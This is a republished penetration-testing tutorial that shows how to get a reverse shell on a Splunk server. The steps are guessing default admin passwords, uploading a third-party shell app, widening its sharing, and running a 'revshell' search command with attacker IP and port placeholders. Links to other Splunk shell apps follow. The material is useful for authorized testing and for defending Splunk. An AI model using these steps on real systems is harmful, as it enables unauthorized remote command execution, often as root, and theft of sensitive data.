Shulou(Shulou.com)05/31 Report--

This article mainly introduces how to install custom application bounce Shell on Splunk, which has a certain reference value, and interested friends can refer to it. I hope you can learn a lot after reading this article.

Preface

I run into Splunk every time I test. Splunk is a software platform for searching, analyzing and visualizing data. Usually, Splunk contains all kinds of data, some of which may be more sensitive. Therefore, its value for penetration testers is self-evident.

To gain access to Splunk, you can try to log in by guessing the password or reusing the password you obtained earlier. Once upon a time, I used "admin:admin" or "admin:changeme" to log in to the administrative console.

Splunk app

One trick I'm sure a lot of people don't know is to use Splunk app to execute python code. The TBG Security team developed a Splunk app that can be used for penetration testing. The app was launched as early as 2017. Nevertheless, I think very few people know about this tool, and I think it should be paid more attention to.

The use of the tool is very simple. First, you just need to download the latest version from the Splunk Shells GitHub page.

After logging in to the Splunk management console, click the "App" column and then click "Manage Apps".

After entering the Apps panel, click Install app from file.

Click the browse button and upload the tar.gz file.

After the application is uploaded successfully, Splunk must be restarted. Log in to Splunk after reboot and return to the "Apps" interface. Click permissions and when you see the "Sharing" option, click the "All Apps" radio button.

After installing app, the last thing you need to do is get the shell. There are some options here, and I chose the standard reverse shell created through Metasploit.

After MSF handler (or netcat listener) is up and running, type the following command to trigger app:

| | revshell SHELLTYPE ATTACKERIP ATTACKERPORT |

This will immediately execute the app and get a reverse shell.

The above tests were carried out on Splunk 7.0and everything went very well! Splunk usually runs as root, which gives attackers the opportunity to enumerate other information about the host, not just in the database scope.

Update:

In addition to the above methods, you can also use Tevora's splunk_pentest_app, and you can refer to their published articles for more information.

Update again (10 / 20 / 2018):

I found an available Splunk web shell: https://github.com/f8al/TA-Shell.

Thank you for reading this article carefully. I hope the article "how to install custom application bounce Shell on Splunk" shared by the editor will be helpful to you. At the same time, I also hope you will support us and pay attention to the industry information channel. More related knowledge is waiting for you to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.